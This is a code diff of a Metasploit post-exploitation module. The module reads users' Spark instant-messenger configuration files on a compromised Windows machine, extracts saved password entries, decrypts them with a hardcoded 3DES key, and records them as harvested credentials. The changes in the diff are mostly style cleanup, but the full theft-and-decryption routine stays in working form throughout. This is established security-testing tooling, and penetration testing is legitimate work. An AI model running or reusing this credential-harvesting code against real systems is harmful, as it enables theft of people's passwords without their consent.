@@ -27,6 +27,11 @@ class MetasploitModule < Msf::Post
         'References' => [
           [ 'URL', 'http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/']
         ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -44,8 +49,8 @@ class MetasploitModule < Msf::Post
   # decrypt spark password
   def decrypt(hash)
     # code to decrypt hash with KEY
-    encrypted = hash.unpack("m")[0]
-    key = "ugfpV1dMC5jyJtqwVAfTpHkxqJ0+E0ae".unpack("m")[0]
+    encrypted = hash.unpack('m')[0]
+    key = 'ugfpV1dMC5jyJtqwVAfTpHkxqJ0+E0ae'.unpack('m')[0]
 
     cipher = OpenSSL::Cipher.new 'des-ede3'
     cipher.decrypt
@@ -58,7 +63,7 @@ class MetasploitModule < Msf::Post
 
     user, pass = password.scan(/[[:print:]]+/)
     cred_opts = {}
-    if pass.nil? or pass.empty?
+    if pass.nil? || pass.empty?
       print_status("Username found: #{user}, but no password")
       cred_opts.merge!(user: user)
     else
@@ -86,7 +91,7 @@ class MetasploitModule < Msf::Post
 
     credential_data = {
       module_fullname: fullname,
-      post_reference_name: self.refname,
+      post_reference_name: refname,
       session_id: session_db_id,
       origin_type: :session,
       username: opts[:user],
@@ -95,58 +100,61 @@ class MetasploitModule < Msf::Post
 
     if opts[:password]
       credential_data.merge!(
-        private_data: opts[:password],
+        private_data: opts[:password]
       )
     end
 
     login_data = {
       core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::UNTRIED,
+      status: Metasploit::Model::Login::Status::UNTRIED
     }.merge(service_data)
 
     create_credential_login(login_data)
   end
 
-  # main control method
   def run
-    grab_user_profiles().each do |user|
-      unless user['AppData'].nil?
-        accounts = user['AppData'] + "\\Spark\\spark.properties"
+    grab_user_profiles.each do |user|
+      next if user['AppData'].nil?
 
-        # open the file for reading
-        config = client.fs.file.new(accounts, 'r') rescue nil
-        next if config.nil?
+      accounts = user['AppData'] + '\\Spark\\spark.properties'
 
-        print_status("Config found for user #{user['UserName']}")
-
-        # read the contents of file
-        contents = config.read
-
-        # look for lines containing string 'password'
-        password = contents.split("\n").grep(/password/)
-        if password.nil?
-          # file doesn't contain a password
-          print_status("#{file} does not contain any saved passwords")
-          # close file and return
-          config.close
-          return
-        end
-
-        # store the hash close the file
-        password = password.delete_if { |e| e !~ /password.+=.+=\r/ }
-        password.each do |pass|
-          if pass.nil?
-            next
-          end
-
-          hash = pass.split("password").join.chomp
-          vprint_status("Spark password hash: #{hash}")
-
-          # call method to decrypt hash
-          decrypt(hash)
-        end
-        config.close
+      # open the file for reading
+      config = begin
+        client.fs.file.new(accounts, 'r')
+      rescue StandardError
+        nil
       end
+      next if config.nil?
+
+      print_status("Config found for user #{user['UserName']}")
+
+      # read the contents of file
+      contents = config.read
+
+      # look for lines containing string 'password'
+      password = contents.split("\n").grep(/password/)
+      if password.blank?
+        # file doesn't contain a password
+        print_status("#{file} does not contain any saved passwords")
+        # close file and return
+        config.close
+        next
+      end
+
+      # store the hash close the file
+      password = password.delete_if { |e| e !~ /password.+=.+=\r/ }
+      password.each do |pass|
+        if pass.nil?
+          next
+        end
+
+        hash = pass.split('password').join.chomp
+        vprint_status("Spark password hash: #{hash}")
+
+        # call method to decrypt hash
+        decrypt(hash)
+      end
+      config.close
     end
   end
 end
